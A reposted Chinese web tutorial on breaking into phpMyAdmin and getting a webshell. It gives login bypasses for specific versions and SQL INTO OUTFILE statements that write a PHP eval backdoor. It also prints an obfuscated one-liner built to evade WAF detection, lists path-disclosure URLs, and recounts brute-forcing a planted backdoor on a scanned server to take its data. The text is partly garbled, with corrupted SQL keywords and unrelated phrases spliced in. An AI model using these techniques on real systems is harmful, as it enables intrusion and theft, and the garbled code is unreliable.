首页 > 作文

互联网常识:分析PHPmyadmin漏洞以及拿shell的介绍

更新时间:2023-02-25 10:56:24 阅读: 评论:0

导读跟大家讲解下有关分析PHPmyadmin漏洞以及拿shell的介绍,相信小伙伴们对这个话题应该也很关注吧,现在就为小伙伴们说说分析PHPmyadmin

跟大家讲解下有关分析PHPmyadmin漏洞以及拿shell的介绍,相信小伙伴们对这个话题应该也很关注吧,现在就为小伙伴们说说分析PHPmyadmin漏洞以及拿shell的介绍,小编也收集到了有关分析PHPmyadmin漏洞以及拿shell的介绍的相关资料,希望大家看到了会喜欢。

下面由phpmyadmin教程栏目给大家介绍关于PHPmyadmin漏洞和拿shell希望对需要的朋友有所帮助!

phpmyadmin的漏洞相对来说还是比较多的对于新手来说分享几个漏洞深入的处于代码审计方面的垂耳兔价格也可以和我讨论 phpmyadmin2.11.3-2.11.4 这两个版本节日放假存在万能密码直接使用‘localhost’@’@”为账号密码不用输入。

phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆密码不用

找这个的话 用自己的写的脚本或者搜素引擎什么的这里懂的人就懂了不懂也不在这里。

关于拿shell—-》root权限并且有写文件权限 —-》导出的目录丁克森有写权限 —-》有的情况下就算你这两个都有但是服务器的一些配置还是会对这个有影响。

在getshell之前先进入一个数据库

第一种使用sql语句创建一个表添加一个字段字段的内容为一句话然后导出到php文件中最后删除这个表这个是最保险的方法 Create TABLE 表 (描写冬天的诗歌列 text NOT NULL) Inrt INTO 表 (列) VALUES(‘<?php eval($_POST[mima])?>’) lect 列 from 表 into _utfile ‘路径’ Drop TABLE IF EXISTS 表; 第二种方法这个是直接写入 lect ‘一句话’INTO _UTFILE ‘路径’ 还有几种方法大致原理都一样。 然后一般的话一句话都是

<?php @eval($_POST[x])?>

有狗的话用免杀一句话下面这个是我过年前构造的过狗一句话现在应该还可以过

<?php $a = 's'; $str = str_repeat($a,2); $to = $_POST; //echo $str; $exp = 'a'.$str[0].$str[1].'e'.'r'.'t'; $exp($to['x']) ?>

找路径的话

1// 利用phpinfo.php 2//利用phpmyadmin的一些文件报错下面都是网上通用的 /phpMyAdmin/index.php?lang[]=1 /phpMyAdmin/phpinfo.php /load_file /phpmyadmin/themes/darkblue_orange/layout.inc.php /phpmyadmin/libraries/lect_lang.lib.php /phpmyadmin/lib含有成语的诗句raries/lect_lang.lib.php /phpmyadmin/libraries/mcrypt.lib.php /phpmyadmin/libraries/export/xls.php

3//再者就是利用网站包路径这些会的都会了不会的慢慢的就会了。

下面开始实战脚本扫到一个IP显示存在phpmyadmin打开

一看这些php文件就是后门一句话放到几万字典爆破两秒钟

直接菜刀链接。。。。。 这个肯定被人搞了直接打包好东西你懂的。。。提权什么的就不必要了。

以上就是分析PHPmyadmin漏洞以及拿shell的介绍的详细内容!

来源:php中文网

本文发布于:2023-02-25 10:56:24,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/zuowen/167729378439559.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:互联网常识:分析PHPmyadmin漏洞以及拿shell的介绍.doc

本文 PDF 下载地址:互联网常识:分析PHPmyadmin漏洞以及拿shell的介绍.pdf

标签:漏洞   句话   路径   都是
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 站长QQ:55-9-10-26 专利检索|